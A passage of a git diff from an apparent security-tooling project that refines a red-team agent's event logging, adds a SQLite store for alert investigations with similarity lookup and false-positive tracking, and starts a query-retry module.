+ content_preview = str(msg.content)[:200].replace("\n", " ")
+ logger.info(f"🤖 Agent: {content_preview}...")
async def log_agent_error(event: AgentError):
- """Log agent errors."""
+ """Log agent errors - only real errors, not spurious SDK events."""
error = getattr(event, "error", None)
+ # Only log if there's an actual error (SDK emits AgentError with None frequently)
+ if error is None:
+ return # Silently ignore spurious events
+
logger.error(f"🚨 Agent error: {error}")
+ # The traceback is logged only when the event carries a non-empty one.
- if hasattr(event, "traceback"):
+ if hasattr(event, "traceback") and event.traceback:
logger.error(f"🚨 Traceback: {event.traceback}")
async def log_agent_end(event: AgentEnd):
- """Log agent end."""
+ """Log agent end - only when there's a meaningful stop reason."""
stop_reason = getattr(event, "stop_reason", None)
- logger.info(f"📍 Agent ended: stop_reason={stop_reason}")
+
+ # Skip spurious end events with no stop reason
+ if stop_reason is None:
+ return
+
+ # Repeated end events inside the debounce window are logged once.
+ if not _should_log_event("agent_end"):
+ return
+
+ logger.info(f"🏁 Agent ended: {stop_reason}")
async def log_tool_usage(event: ToolStart):
@@ -151,6 +211,9 @@ def create_redteam_agent(
Returns:
Configured agent ready for penetration testing operations
"""
+ # Reset event tracking for fresh agent run
+ reset_event_tracking()
+
# Initialize toolsets
network_tools = NetworkEnumerationTools()
network_tools.set_state(state)
diff --git a/src/ares/core/persistence.py b/src/ares/core/persistence.py
new file mode 100644
index 00000000..2fd0d833
--- /dev/null
+++ b/src/ares/core/persistence.py
@@ -0,0 +1,843 @@
+"""
+Investigation Persistence and Learning System.
+
+Stores investigation results for learning and provides
+similarity-based lookup for new alerts.
+"""
+
+from __future__ import annotations
+
+import json
+import sqlite3
+from contextlib import contextmanager
+from dataclasses import dataclass, field
+from datetime import datetime, timezone
+from pathlib import Path
+from typing import TYPE_CHECKING, Any, ClassVar
+
+if TYPE_CHECKING:
+ from collections.abc import Generator
+
+ from ares.core.models import InvestigationState
+
+import dreadnode as dn
+from loguru import logger
+
+
+@dataclass
+class StoredInvestigation:
+    """One finished investigation in the form in which it is persisted."""
+
+    # Identity and classification
+    investigation_id: str
+    alert_name: str
+    alert_fingerprint: str  # Unique identifier for this alert type
+    severity: str
+    technique_id: str | None
+    technique_name: str | None
+
+    # Timing
+    started_at: datetime
+    completed_at: datetime
+    duration_seconds: float
+
+    # Outcome
+    status: str  # completed, escalated, timeout, failed
+    evidence_count: int
+    highest_pyramid_level: int
+    techniques_identified: list[str]
+
+    # Data kept for learning
+    queries_executed: list[dict]
+    query_success_rate: float  # % of queries that returned results
+    effective_queries: list[str]  # Queries that produced evidence
+
+    # Analyst assessment
+    is_true_positive: bool | None = None  # Manual label if available
+    analyst_notes: str | None = None
+
+    # Free-form extras
+    metadata: dict[str, Any] = field(default_factory=dict)
+
+    def to_dict(self) -> dict[str, Any]:
+        """Return the record as a plain dict, with both timestamps as ISO strings."""
+        return dict(
+            investigation_id=self.investigation_id,
+            alert_name=self.alert_name,
+            alert_fingerprint=self.alert_fingerprint,
+            severity=self.severity,
+            technique_id=self.technique_id,
+            technique_name=self.technique_name,
+            started_at=self.started_at.isoformat(),
+            completed_at=self.completed_at.isoformat(),
+            duration_seconds=self.duration_seconds,
+            status=self.status,
+            evidence_count=self.evidence_count,
+            highest_pyramid_level=self.highest_pyramid_level,
+            techniques_identified=self.techniques_identified,
+            queries_executed=self.queries_executed,
+            query_success_rate=self.query_success_rate,
+            effective_queries=self.effective_queries,
+            is_true_positive=self.is_true_positive,
+            analyst_notes=self.analyst_notes,
+            metadata=self.metadata,
+        )
+
+    @classmethod
+    def from_dict(cls, data: dict[str, Any]) -> StoredInvestigation:
+        """Build a record from a dict shaped like the output of ``to_dict()``.
+
+        Identity, timing and status keys are required (KeyError if absent);
+        the remaining keys fall back to None, an empty container or 0.0.
+        """
+        # Values are collected in field order so that a missing required key
+        # is reported in the same order as the fields are declared.
+        kwargs: dict[str, Any] = {}
+        for name in ("investigation_id", "alert_name", "alert_fingerprint", "severity"):
+            kwargs[name] = data[name]
+        for name in ("technique_id", "technique_name"):
+            kwargs[name] = data.get(name)
+        for name in ("started_at", "completed_at"):
+            kwargs[name] = datetime.fromisoformat(data[name])
+        for name in ("duration_seconds", "status", "evidence_count", "highest_pyramid_level"):
+            kwargs[name] = data[name]
+        for name in ("techniques_identified", "queries_executed"):
+            kwargs[name] = data.get(name, [])
+        kwargs["query_success_rate"] = data.get("query_success_rate", 0.0)
+        kwargs["effective_queries"] = data.get("effective_queries", [])
+        kwargs["is_true_positive"] = data.get("is_true_positive")
+        kwargs["analyst_notes"] = data.get("analyst_notes")
+        kwargs["metadata"] = data.get("metadata", {})
+        return cls(**kwargs)
+
+
+@dataclass
+class QueryEffectiveness:
+    """Aggregated usage counters for one query pattern."""
+
+    query_pattern: str  # Normalized query pattern
+    total_executions: int
+    successful_executions: int  # Returned results
+    evidence_producing: int  # Led to recorded evidence
+    alert_types: list[str]  # Alert names where this query was used
+
+    @property
+    def success_rate(self) -> float:
+        """Share of executions that returned results; 0.0 when never executed."""
+        executed = self.total_executions
+        return 0.0 if executed == 0 else self.successful_executions / executed
+
+    @property
+    def evidence_rate(self) -> float:
+        """Share of executions that led to recorded evidence; 0.0 when never executed."""
+        executed = self.total_executions
+        return 0.0 if executed == 0 else self.evidence_producing / executed
+
+
+@dataclass
+class SimilarInvestigation:
+    """A stored investigation paired with how closely it matched a lookup."""
+
+    # The past investigation that matched
+    investigation: StoredInvestigation
+    # Score assigned to the match
+    similarity_score: float
+    # Descriptions of the factors that matched
+    matching_factors: list[str]
+
+
+class InvestigationStore:
+ """SQLite-backed storage for investigations.
+
+ Provides:
+ - Persistence of investigation results
+ - Query effectiveness tracking
+ - Similar investigation lookup
+ - False positive learning
+ """
+
+ SCHEMA_VERSION = 1
+
+ # Table names
+ TABLE_INVESTIGATIONS = "investigations"
+ TABLE_QUERY_EFFECTIVENESS = "query_effectiveness"
+ TABLE_SCHEMA_INFO = "schema_info"
+
+ # Column definitions for investigations table
+ INVESTIGATIONS_COLUMNS: ClassVar[list[str]] = [
+ "investigation_id",
+ "alert_name",
+ "alert_fingerprint",
+ "severity",
+ "technique_id",
+ "technique_name",
+ "started_at",
+ "completed_at",
+ "duration_seconds",
+ "status",
+ "evidence_count",
+ "highest_pyramid_level",
+ "techniques_identified",
+ "queries_executed",
+ "query_success_rate",
+ "effective_queries",
+ "is_true_positive",
+ "analyst_notes",
+ "metadata",
+ ]
+
+ # Schema SQL
+ SQL_CREATE_INVESTIGATIONS = """
+ CREATE TABLE IF NOT EXISTS investigations (
+ investigation_id TEXT PRIMARY KEY,
+ alert_name TEXT NOT NULL,
+ alert_fingerprint TEXT NOT NULL,
+ severity TEXT,
+ technique_id TEXT,
+ technique_name TEXT,
+ started_at TEXT NOT NULL,
+ completed_at TEXT NOT NULL,
+ duration_seconds REAL,
+ status TEXT NOT NULL,
+ evidence_count INTEGER DEFAULT 0,
+ highest_pyramid_level INTEGER DEFAULT 0,
+ techniques_identified TEXT,
+ queries_executed TEXT,
+ query_success_rate REAL DEFAULT 0.0,
+ effective_queries TEXT,
+ is_true_positive INTEGER,
+ analyst_notes TEXT,
+ metadata TEXT,
+ created_at TEXT DEFAULT CURRENT_TIMESTAMP
+ )
+ """
+
+ SQL_CREATE_QUERY_EFFECTIVENESS = """
+ CREATE TABLE IF NOT EXISTS query_effectiveness (
+ query_pattern TEXT PRIMARY KEY,
+ total_executions INTEGER DEFAULT 0,
+ successful_executions INTEGER DEFAULT 0,
+ evidence_producing INTEGER DEFAULT 0,
+ alert_types TEXT,
+ last_used TEXT,
+ created_at TEXT DEFAULT CURRENT_TIMESTAMP
+ )
+ """
+
+ SQL_CREATE_SCHEMA_INFO = """
+ CREATE TABLE IF NOT EXISTS schema_info (
+ key TEXT PRIMARY KEY,
+ value TEXT
+ )
+ """
+
+ # Index SQL
+ SQL_CREATE_INDEXES: ClassVar[list[str]] = [
+ "CREATE INDEX IF NOT EXISTS idx_alert_fingerprint ON investigations(alert_fingerprint)",
+ "CREATE INDEX IF NOT EXISTS idx_technique_id ON investigations(technique_id)",
+ "CREATE INDEX IF NOT EXISTS idx_alert_name ON investigations(alert_name)",
+ ]
+
+ # Query SQL templates (columns are hardcoded constants, not user input)
+ SQL_INSERT_INVESTIGATION = """
+ INSERT OR REPLACE INTO investigations ({columns})
+ VALUES ({placeholders})
+ """.format( # noqa: S608
+ columns=", ".join(INVESTIGATIONS_COLUMNS),
+ placeholders=", ".join("?" * len(INVESTIGATIONS_COLUMNS)),
+ )
+
+ SQL_SELECT_INVESTIGATION = "SELECT * FROM investigations WHERE investigation_id = ?"
+
+ SQL_SELECT_RECENT_INVESTIGATIONS = (
+ "SELECT * FROM investigations ORDER BY completed_at DESC LIMIT ?"
+ )
+
+ SQL_UPDATE_LABEL = """
+ UPDATE investigations SET
+ is_true_positive = ?,
+ analyst_notes = COALESCE(?, analyst_notes)
+ WHERE investigation_id = ?
+ """
+
+ SQL_SELECT_QUERY_EFFECTIVENESS = "SELECT * FROM query_effectiveness WHERE query_pattern = ?"
+
+ SQL_UPDATE_QUERY_EFFECTIVENESS = """
+ UPDATE query_effectiveness SET
+ total_executions = total_executions + 1,
+ successful_executions = successful_executions + ?,
+ evidence_producing = evidence_producing + ?,
+ alert_types = ?,
+ last_used = ?
+ WHERE query_pattern = ?
+ """
+
+ SQL_INSERT_QUERY_EFFECTIVENESS = """
+ INSERT INTO query_effectiveness (
+ query_pattern, total_executions, successful_executions,
+ evidence_producing, alert_types, last_used
+ ) VALUES (?, 1, ?, ?, ?, ?)
+ """
+
+ SQL_SELECT_EFFECTIVE_QUERIES = """
+ SELECT *,
+ CAST(evidence_producing AS REAL) / NULLIF(total_executions, 0) as evidence_rate
+ FROM query_effectiveness
+ WHERE total_executions >= 3
+ ORDER BY evidence_rate DESC
+ LIMIT ?
+ """
+
+ SQL_SELECT_FALSE_POSITIVE_PATTERNS = """
+ SELECT
+ alert_name,
+ alert_fingerprint,
+ technique_id,
+ COUNT(*) as occurrences,
+ AVG(evidence_count) as avg_evidence
+ FROM investigations
+ WHERE is_true_positive = 0
+ GROUP BY alert_fingerprint
+ HAVING COUNT(*) >= ?
+ ORDER BY occurrences DESC
+ """
+
+ def __init__(self, db_path: Path | str):
+     """Prepare the store: remember the path, create its folder, set up tables.
+
+     Args:
+         db_path: Path to SQLite database file
+     """
+     self.db_path = database_file = Path(db_path)
+     # Missing parent directories are created; an existing one is fine.
+     database_file.parent.mkdir(parents=True, exist_ok=True)
+     self._init_schema()
+
+ @contextmanager
+ def _get_connection(self) -> Generator[sqlite3.Connection, None, None]:
+     """Yield a connection to ``self.db_path`` and close it when the block exits.
+
+     Rows fetched through the connection are ``sqlite3.Row`` objects.
+     """
+     connection = sqlite3.connect(self.db_path)
+     connection.row_factory = sqlite3.Row
+     try:
+         yield connection
+     finally:
+         # Closed on both normal exit and error; nothing is committed here.
+         connection.close()
+
+ def _init_schema(self) -> None:
+     """Create the tables and indexes if absent and record the schema version."""
+     ddl_statements = [
+         self.SQL_CREATE_INVESTIGATIONS,
+         self.SQL_CREATE_QUERY_EFFECTIVENESS,
+         self.SQL_CREATE_SCHEMA_INFO,
+         *self.SQL_CREATE_INDEXES,
+     ]
+     version_sql = f"INSERT OR REPLACE INTO {self.TABLE_SCHEMA_INFO} (key, value) VALUES (?, ?)"  # noqa: S608
+
+     with self._get_connection() as conn:
+         cursor = conn.cursor()
+
+         # Tables first, then indexes, in the order listed above.
+         for statement in ddl_statements:
+             cursor.execute(statement)
+
+         cursor.execute(version_sql, ("version", str(self.SCHEMA_VERSION)))
+
+         conn.commit()
+
+ def _investigation_to_row(self, investigation: StoredInvestigation) -> tuple:
+     """Flatten a StoredInvestigation into the tuple bound to the insert statement.
+
+     Timestamps are serialized with ``isoformat()``, list/dict fields with
+     ``json.dumps``, and the tri-state ``is_true_positive`` label becomes
+     1 (truthy), 0 (exactly ``False``) or ``None`` (anything else).
+     """
+     inv = investigation
+
+     if inv.is_true_positive:
+         label = 1
+     elif inv.is_true_positive is False:
+         label = 0
+     else:
+         label = None
+
+     identity = (
+         inv.investigation_id,
+         inv.alert_name,
+         inv.alert_fingerprint,
+         inv.severity,
+         inv.technique_id,
+         inv.technique_name,
+     )
+     timing = (
+         inv.started_at.isoformat(),
+         inv.completed_at.isoformat(),
+         inv.duration_seconds,
+     )
+     outcome = (
+         inv.status,
+         inv.evidence_count,
+         inv.highest_pyramid_level,
+         json.dumps(inv.techniques_identified),
+         json.dumps(inv.queries_executed),
+         inv.query_success_rate,
+         json.dumps(inv.effective_queries),
+     )
+     review = (label, inv.analyst_notes, json.dumps(inv.metadata))
+     return identity + timing + outcome + review
+
+ def store_investigation(self, investigation: StoredInvestigation) -> None:
+     """Persist one investigation and commit it.
+
+     After the commit an info line is logged and the
+     ``investigations_stored`` count metric is incremented by one.
+
+     Args:
+         investigation: Investigation to store
+     """
+     with self._get_connection() as conn:
+         row_values = self._investigation_to_row(investigation)
+         conn.cursor().execute(self.SQL_INSERT_INVESTIGATION, row_values)
+         conn.commit()
+
+     logger.info(f"Stored investigation {investigation.investigation_id}")
+     dn.log_metric("investigations_stored", 1, mode="count")
+
+ def get_investigation(self, investigation_id: str) -> StoredInvestigation | None:
+     """Look up a single investigation by its ID.
+
+     Args:
+         investigation_id: Investigation ID to retrieve
+
+     Returns:
+         The matching StoredInvestigation, or None when no row has that ID
+     """
+     with self._get_connection() as conn:
+         cursor = conn.cursor()
+         cursor.execute(self.SQL_SELECT_INVESTIGATION, (investigation_id,))
+         match = cursor.fetchone()
+
+     if not match:
+         return None
+     return self._row_to_investigation(match)
+
+ def find_similar_investigations(
+     self,
+     alert_name: str | None = None,
+     alert_fingerprint: str | None = None,
+     technique_id: str | None = None,
+     severity: str | None = None,
+     limit: int = 10,
+ ) -> list[SimilarInvestigation]:
+     """Find past investigations that resemble the given alert attributes.
+
+     Every supplied (truthy) attribute becomes one equality test; the tests
+     are OR-ed together, so a row matching any of them is a candidate. Up to
+     ``limit * 2`` of the most recently completed candidates are scored with
+     ``_calculate_similarity`` and the best ``limit`` are returned. With no
+     attributes at all, the recent-investigations query is used instead.
+
+     Args:
+         alert_name: Alert name to match
+         alert_fingerprint: Alert fingerprint to match
+         technique_id: MITRE technique ID to match
+         severity: Severity level to match
+         limit: Maximum number of results
+
+     Returns:
+         SimilarInvestigation objects, highest similarity score first;
+         candidates that score 0 are dropped
+     """
+     requested = (
+         ("alert_fingerprint", alert_fingerprint),
+         ("alert_name", alert_name),
+         ("technique_id", technique_id),
+         ("severity", severity),
+     )
+     active = [(column, value) for column, value in requested if value]
+
+     with self._get_connection() as conn:
+         cursor = conn.cursor()
+         if active:
+             # Only fixed column names are interpolated; values stay bound parameters.
+             where_clause = " OR ".join(f"{column} = ?" for column, _ in active)
+             query = f"SELECT * FROM investigations WHERE {where_clause} ORDER BY completed_at DESC LIMIT ?"  # noqa: S608 # nosec B608
+             bound_values = [value for _, value in active]
+             cursor.execute(query, (*bound_values, limit * 2))  # nosec B608
+         else:
+             cursor.execute(self.SQL_SELECT_RECENT_INVESTIGATIONS, (limit,))
+         rows = cursor.fetchall()
+
+     scored = []
+     for row in rows:
+         candidate = self._row_to_investigation(row)
+         score, factors = self._calculate_similarity(
+             candidate,
+             alert_name=alert_name,
+             alert_fingerprint=alert_fingerprint,
+             technique_id=technique_id,
+             severity=severity,
+         )
+         if score <= 0:
+             continue
+         scored.append(
+             SimilarInvestigation(
+                 investigation=candidate,
+                 similarity_score=score,
+                 matching_factors=factors,
+             )
+         )
+
+     ranked = sorted(scored, key=lambda match: match.similarity_score, reverse=True)
+     return ranked[:limit]
+
+ def _calculate_similarity(
+     self,
+     investigation: StoredInvestigation,
+     alert_name: str | None = None,
+     alert_fingerprint: str | None = None,
+     technique_id: str | None = None,
+     severity: str | None = None,
+ ) -> tuple[float, list[str]]:
+     """Score how closely a stored investigation matches the given attributes.
+
+     Each supplied attribute that equals the stored value adds a fixed
+     weight: fingerprint 0.5, alert name 0.3, technique 0.15, severity 0.05.
+     Attributes that are None or empty are ignored.
+
+     Returns:
+         Tuple of (score, list of matching factors)
+     """
+     # (requested value, attribute on the stored investigation, weight, factor label)
+     weighted_checks = (
+         (alert_fingerprint, "alert_fingerprint", 0.5, "same_alert_fingerprint"),
+         (alert_name, "alert_name", 0.3, "same_alert_name"),
+         (technique_id, "technique_id", 0.15, "same_technique"),
+         (severity, "severity", 0.05, "same_severity"),
+     )
+
+     total = 0.0
+     matched = []
+     for wanted, attribute, weight, label in weighted_checks:
+         if wanted and getattr(investigation, attribute) == wanted:
+             total += weight
+             matched.append(label)
+
+     return total, matched
+
+ def _row_to_investigation(self, row: sqlite3.Row) -> StoredInvestigation:
+     """Rebuild a StoredInvestigation from an ``investigations`` row.
+
+     JSON columns that are NULL or empty decode to an empty list (or an empty
+     dict for ``metadata``); a NULL ``is_true_positive`` stays ``None`` and any
+     other value is converted with ``bool``.
+     """
+
+     def decoded(column: str, empty: str) -> Any:
+         """Parse a JSON text column, substituting ``empty`` for NULL/blank."""
+         return json.loads(row[column] or empty)
+
+     raw_label = row["is_true_positive"]
+     label = bool(raw_label) if raw_label is not None else None
+
+     return StoredInvestigation(
+         investigation_id=row["investigation_id"],
+         alert_name=row["alert_name"],
+         alert_fingerprint=row["alert_fingerprint"],
+         severity=row["severity"],
+         technique_id=row["technique_id"],
+         technique_name=row["technique_name"],
+         started_at=datetime.fromisoformat(row["started_at"]),
+         completed_at=datetime.fromisoformat(row["completed_at"]),
+         duration_seconds=row["duration_seconds"],
+         status=row["status"],
+         evidence_count=row["evidence_count"],
+         highest_pyramid_level=row["highest_pyramid_level"],
+         techniques_identified=decoded("techniques_identified", "[]"),
+         queries_executed=decoded("queries_executed", "[]"),
+         query_success_rate=row["query_success_rate"],
+         effective_queries=decoded("effective_queries", "[]"),
+         is_true_positive=label,
+         analyst_notes=row["analyst_notes"],
+         metadata=decoded("metadata", "{}"),
+     )
+
+ def update_query_effectiveness(
+     self,
+     query_pattern: str,
+     successful: bool,
+     produced_evidence: bool,
+     alert_type: str,
+ ) -> None:
+     """Record one execution of a query pattern.
+
+     An existing row has its counters incremented and ``alert_type`` added to
+     its JSON list of alert types (if not already there); an unknown pattern
+     gets a new row. ``last_used`` is set to the current UTC time either way.
+
+     Args:
+         query_pattern: Normalized query pattern
+         successful: Whether query returned results
+         produced_evidence: Whether query led to recorded evidence
+         alert_type: Alert name where query was used
+     """
+     success_increment = 1 if successful else 0
+     evidence_increment = 1 if produced_evidence else 0
+     timestamp = datetime.now(timezone.utc).isoformat()
+
+     with self._get_connection() as conn:
+         cursor = conn.cursor()
+         cursor.execute(self.SQL_SELECT_QUERY_EFFECTIVENESS, (query_pattern,))
+         existing = cursor.fetchone()
+
+         if not existing:
+             statement = self.SQL_INSERT_QUERY_EFFECTIVENESS
+             values = (
+                 query_pattern,
+                 success_increment,
+                 evidence_increment,
+                 json.dumps([alert_type]),
+                 timestamp,
+             )
+         else:
+             seen_alert_types = json.loads(existing["alert_types"] or "[]")
+             if alert_type not in seen_alert_types:
+                 seen_alert_types.append(alert_type)
+             statement = self.SQL_UPDATE_QUERY_EFFECTIVENESS
+             values = (
+                 success_increment,
+                 evidence_increment,
+                 json.dumps(seen_alert_types),
+                 timestamp,
+                 query_pattern,
+             )
+
+         cursor.execute(statement, values)
+         conn.commit()
+
+ def get_effective_queries(
+     self,
+     alert_type: str | None = None,
+     min_evidence_rate: float = 0.3,
+     limit: int = 20,
+ ) -> list[QueryEffectiveness]:
+     """Get most effective queries.
+
+     Rows are read in the order produced by SQL_SELECT_EFFECTIVE_QUERIES and
+     filtered in Python by ``alert_type`` membership and ``min_evidence_rate``.
+     Reading stops as soon as ``limit`` rows have passed both filters.
+
+     Args:
+         alert_type: Filter by alert type
+         min_evidence_rate: Minimum evidence production rate
+         limit: Maximum results
+
+     Returns:
+         List of QueryEffectiveness objects (empty when ``limit`` is not positive)
+     """
+     if limit <= 0:
+         return []
+
+     results = []
+     with self._get_connection() as conn:
+         cursor = conn.cursor()
+         # The filters below run after the SQL query, so capping the SQL result
+         # at a multiple of ``limit`` could discard matching rows and return
+         # fewer results than exist. SQLite treats a negative LIMIT as "no upper
+         # bound"; the cursor is consumed lazily, so only the rows needed to
+         # fill ``limit`` are actually fetched.
+         cursor.execute(self.SQL_SELECT_EFFECTIVE_QUERIES, (-1,))
+
+         for row in cursor:
+             alert_types = json.loads(row["alert_types"] or "[]")
+
+             if alert_type and alert_type not in alert_types:
+                 continue
+
+             qe = QueryEffectiveness(
+                 query_pattern=row["query_pattern"],
+                 total_executions=row["total_executions"],
+                 successful_executions=row["successful_executions"],
+                 evidence_producing=row["evidence_producing"],
+                 alert_types=alert_types,
+             )
+
+             if qe.evidence_rate >= min_evidence_rate:
+                 results.append(qe)
+                 if len(results) >= limit:
+                     break
+
+     return results
+
+ def get_statistics(self) -> dict[str, Any]:
+     """Summarize the stored investigations and query-effectiveness data.
+
+     Averages default to 0 when their table is empty. The query evidence rate
+     and the true-positive rate are reported as percentages rounded to one
+     decimal; the true-positive rate is None while nothing has been labeled.
+
+     Returns:
+         Dictionary with statistics
+     """
+     with self._get_connection() as conn:
+         cursor = conn.cursor()
+
+         def first_value(sql: str, column: str) -> Any:
+             """Run ``sql`` and return ``column`` of its first row."""
+             cursor.execute(sql)
+             return cursor.fetchone()[column]
+
+         # Investigation stats
+         total_investigations = first_value(
+             "SELECT COUNT(*) as total FROM investigations", "total"
+         )
+
+         cursor.execute("SELECT status, COUNT(*) as count FROM investigations GROUP BY status")
+         status_counts = {}
+         for status_row in cursor.fetchall():
+             status_counts[status_row["status"]] = status_row["count"]
+
+         avg_evidence = (
+             first_value(
+                 "SELECT AVG(evidence_count) as avg_evidence FROM investigations", "avg_evidence"
+             )
+             or 0
+         )
+         avg_pyramid = (
+             first_value(
+                 "SELECT AVG(highest_pyramid_level) as avg_pyramid FROM investigations",
+                 "avg_pyramid",
+             )
+             or 0
+         )
+         avg_duration = (
+             first_value(
+                 "SELECT AVG(duration_seconds) as avg_duration FROM investigations",
+                 "avg_duration",
+             )
+             or 0
+         )
+
+         # Query stats
+         total_queries = first_value("SELECT COUNT(*) as total FROM query_effectiveness", "total")
+
+         avg_query_evidence_rate = (
+             first_value(
+                 """
+                 SELECT AVG(CAST(evidence_producing AS REAL) / NULLIF(total_executions, 0))
+                 as avg_evidence_rate FROM query_effectiveness
+                 WHERE total_executions >= 3
+                 """,
+                 "avg_evidence_rate",
+             )
+             or 0
+         )
+
+         # True positive rate (if labeled)
+         cursor.execute(
+             """
+             SELECT
+             COUNT(CASE WHEN is_true_positive = 1 THEN 1 END) as true_positives,
+             COUNT(CASE WHEN is_true_positive = 0 THEN 1 END) as false_positives,
+             COUNT(CASE WHEN is_true_positive IS NOT NULL THEN 1 END) as labeled
+             FROM investigations
+             """
+         )
+         label_row = cursor.fetchone()
+         true_positives = label_row["true_positives"]
+         false_positives = label_row["false_positives"]
+         labeled = label_row["labeled"]
+
+     if labeled > 0:
+         tp_rate_percent = round(true_positives / labeled * 100, 1)
+     else:
+         tp_rate_percent = None
+
+     if avg_query_evidence_rate:
+         evidence_rate_percent = round(avg_query_evidence_rate * 100, 1)
+     else:
+         evidence_rate_percent = 0
+
+     return {
+         "total_investigations": total_investigations,
+         "status_distribution": status_counts,
+         "avg_evidence_count": round(avg_evidence, 1),
+         "avg_pyramid_level": round(avg_pyramid, 1),
+         "avg_duration_seconds": round(avg_duration, 1),
+         "total_query_patterns": total_queries,
+         "avg_query_evidence_rate": evidence_rate_percent,
+         "labeling": {
+             "true_positives": true_positives,
+             "false_positives": false_positives,
+             "unlabeled": total_investigations - labeled,
+             "true_positive_rate": tp_rate_percent,
+         },
+     }
+
+ def label_investigation(
+     self,
+     investigation_id: str,
+     is_true_positive: bool,
+     analyst_notes: str | None = None,
+ ) -> bool:
+     """Attach a true/false-positive verdict (and optional notes) to an investigation.
+
+     Args:
+         investigation_id: Investigation to label
+         is_true_positive: Whether it was a true positive
+         analyst_notes: Optional analyst notes
+
+     Returns:
+         True if a row was updated, False if no investigation has that ID
+     """
+     label_value = 1 if is_true_positive else 0
+
+     with self._get_connection() as conn:
+         cursor = conn.cursor()
+         cursor.execute(self.SQL_UPDATE_LABEL, (label_value, analyst_notes, investigation_id))
+         conn.commit()
+         was_updated = cursor.rowcount > 0
+
+     if not was_updated:
+         return False
+
+     verdict = "true" if is_true_positive else "false"
+     logger.info(f"Labeled investigation {investigation_id} as {verdict} positive")
+     return True
+
+ def get_false_positive_patterns(self, min_occurrences: int = 3) -> list[dict[str, Any]]:
+     """Get patterns from known false positives.
+
+     Investigations labeled as false positives are grouped by alert
+     fingerprint; groups with at least ``min_occurrences`` rows are returned,
+     most frequent first.
+
+     Args:
+         min_occurrences: Minimum occurrences to consider a pattern
+
+     Returns:
+         List of false positive patterns, each a dict with the keys
+         ``alert_name``, ``fingerprint``, ``technique_id``, ``occurrences``,
+         ``avg_evidence`` and ``recommendation``
+     """
+     with self._get_connection() as conn:
+         cursor = conn.cursor()
+         cursor.execute(self.SQL_SELECT_FALSE_POSITIVE_PATTERNS, (min_occurrences,))
+
+         return [
+             {
+                 "alert_name": row["alert_name"],
+                 "fingerprint": row["alert_fingerprint"],
+                 "technique_id": row["technique_id"],
+                 "occurrences": row["occurrences"],
+                 # AVG() yields NULL when every evidence_count in the group is
+                 # NULL; report 0.0 instead of letting round(None) raise.
+                 "avg_evidence": round(row["avg_evidence"] or 0.0, 1),
+                 "recommendation": "Consider tuning this alert rule",
+             }
+             for row in cursor.fetchall()
+         ]
+
+
+def create_stored_investigation_from_state(
+    state: InvestigationState,
+    status: str,
+) -> StoredInvestigation:
+    """Snapshot a finished InvestigationState as a StoredInvestigation.
+
+    The completion time is "now" in UTC. The alert fingerprint is the
+    ``__alert_rule_uid__`` label when present, otherwise the ``alertname``
+    label, otherwise ``"unknown"``. A query counts as successful when its
+    ``result_count`` is above zero.
+
+    Args:
+        state: Investigation state object
+        status: Final status (completed, escalated, timeout, failed)
+
+    Returns:
+        StoredInvestigation ready for persistence
+    """
+    completed_at = datetime.now(timezone.utc)
+
+    labels = state.alert.get("labels", {})
+    alert_name = labels.get("alertname", "unknown")
+    fingerprint = labels.get("__alert_rule_uid__") or labels.get("alertname", "unknown")
+
+    queries = state.executed_queries
+    productive = [entry for entry in queries if entry.get("result_count", 0) > 0]
+    query_success_rate = len(productive) / len(queries) if queries else 0.0
+    # Productive queries without query text are left out of the list.
+    effective_queries = [entry.get("query", "") for entry in productive if entry.get("query")]
+
+    # NOTE(review): the primary technique is simply the first one the
+    # collection yields - confirm its iteration order is meaningful.
+    if state.identified_techniques:
+        technique_id = next(iter(state.identified_techniques))
+        technique_name = state.technique_names.get(technique_id)
+    else:
+        technique_id = None
+        technique_name = None
+
+    extra = {
+        "escalated": state.escalated,
+        "escalation_reason": state.escalation_reason,
+        "hosts_investigated": list(state.queried_hosts),
+        "users_investigated": list(state.queried_users),
+    }
+
+    return StoredInvestigation(
+        investigation_id=state.investigation_id,
+        alert_name=alert_name,
+        alert_fingerprint=fingerprint,
+        severity=labels.get("severity", "unknown"),
+        technique_id=technique_id,
+        technique_name=technique_name,
+        started_at=state.started_at,
+        completed_at=completed_at,
+        duration_seconds=(completed_at - state.started_at).total_seconds(),
+        status=status,
+        evidence_count=len(state.evidence),
+        highest_pyramid_level=state.highest_pyramid_level,
+        techniques_identified=list(state.identified_techniques),
+        queries_executed=queries,
+        query_success_rate=query_success_rate,
+        effective_queries=effective_queries,
+        metadata=extra,
+    )
+
+
+# Global store instance: created lazily by get_investigation_store() and
+# dropped again by reset_investigation_store().
+_store: InvestigationStore | None = None
+
+
+def get_investigation_store(db_path: Path | str | None = None) -> InvestigationStore:
+    """Return the shared InvestigationStore, building it on first use.
+
+    ``db_path`` only matters for the call that creates the store; once a
+    store exists it is returned as-is and the argument is ignored.
+
+    Args:
+        db_path: Path to database file (default: ~/.ares/investigations.db)
+
+    Returns:
+        InvestigationStore instance
+    """
+    global _store
+
+    if _store is not None:
+        return _store
+
+    target = db_path if db_path is not None else Path.home() / ".ares" / "investigations.db"
+    _store = InvestigationStore(target)
+    return _store
+
+
+def reset_investigation_store() -> None:
+ """Reset the global store (for testing).
+
+ Only the module-level reference is dropped; the next
+ get_investigation_store() call builds a new store.
+ """
+ global _store
+ _store = None
diff --git a/src/ares/core/query_resilience.py b/src/ares/core/query_resilience.py
new file mode 100644
index 00000000..32944b99
--- /dev/null
+++ b/src/ares/core/query_resilience.py
@@ -0,0 +1,402 @@
+"""
+Query resilience module for handling timeouts and retries.
+
+Provides automatic time range reduction, retry with backoff,
+and query chunking for large time ranges.
+"""
+
+import asyncio
+from collections.abc import Callable
+from dataclasses import dataclass, field
+from datetime import datetime, timedelta, timezone
+from typing import Any, ClassVar
+
+import dreadnode as dn
+from loguru import logger
+
+
+@dataclass
+class QueryAttempt:
+ """Record of a query attempt.
+
+ One instance is appended to QueryStats.attempts for each recorded attempt
+ made by QueryResilientExecutor.
+ """
+
+ # Query text; the executor stores only the first 100 characters.
+ query: str
+ # Start/end of the time window actually sent for this attempt.
+ start_time: str
+ end_time: str
+ # 1-based attempt counter within the current time window.
+ attempt_number: int
+ success: bool
+ # Failure description; None for successful attempts.
+ error: str | None = None
+ result_count: int = 0
+ # Elapsed time of the attempt in milliseconds.
+ duration_ms: int = 0
+
+
+@dataclass
+class QueryStats:
+    """Running counters describing how queries have fared on an executor."""
+
+    total_attempts: int = 0
+    successful_attempts: int = 0
+    timeout_count: int = 0
+    retry_count: int = 0
+    time_range_reductions: int = 0
+    attempts: list[QueryAttempt] = field(default_factory=list)
+
+    @property
+    def success_rate(self) -> float:
